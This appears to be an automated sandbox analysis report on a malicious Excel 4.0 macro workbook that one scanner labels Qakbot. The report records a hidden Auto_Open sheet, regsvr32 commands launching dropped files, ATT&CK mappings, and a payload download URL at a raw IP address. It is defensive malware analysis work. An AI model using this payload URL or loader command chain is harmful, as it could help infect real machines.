Source: Screenshot number: 12	Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Screenshot number: 12	Screenshot OCR: Enable Content Sheet1 CD Ready O Type here to search i 1 El a a g xg 191 m m I i '00% ^ E2 g
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0	Screenshot OCR: Enable Content

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Permission-40776837-06252021.xlsm

Initial sample: EXEC

Source: workbook.xml

Binary string: "/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{89C0748D-BB39-4A32-8068-C0C630B753E6}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/><sheet name="Sheet" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Sheet4" sheetId="4" state="hidden" r:id="rId3"/><sheet name="Sheet2" sheetId="3" state="hidden" r:id="rId4"/></sheets><definedNames><definedName hidden="1" name="_xlnm.Auto_Open">Sheet!$G$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: classification engine

Classification label: mal64.expl.evad.winXLSM@7/8@0/3

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{6766231E-E434-4153-BE81-13F76F647B8B} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Permission-40776837-06252021.xlsm	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-40776837-06252021.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-40776837-06252021.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	DLL Side-Loading1	Process Injection1	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution22	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	System Information Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Permission-40776837-06252021.xlsm	5%	Virustotal		Browse
Permission-40776837-06252021.xlsm	4%	ReversingLabs	Document-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.183.99.120/44372.78513125.dat	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Virustotal		Browse
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.183.99.120/44372.78513125.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://login.microsoftonline.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://shell.suite.office.com:1443	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://autodiscover-s.outlook.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://cdn.entity.	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://powerlift.acompli.net	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://cortana.ai	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://api.aadrm.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://api.microsoftstream.com/api/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://cr.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://graph.ppe.windows.net	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://officeci.azurewebsites.net/api/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://store.office.cn/addinstemplate	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://globaldisco.crm.dynamics.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://store.officeppe.com/addinstemplate	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://web.microsoftstream.com/video/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://graph.windows.net	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://dataservice.o365filtering.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
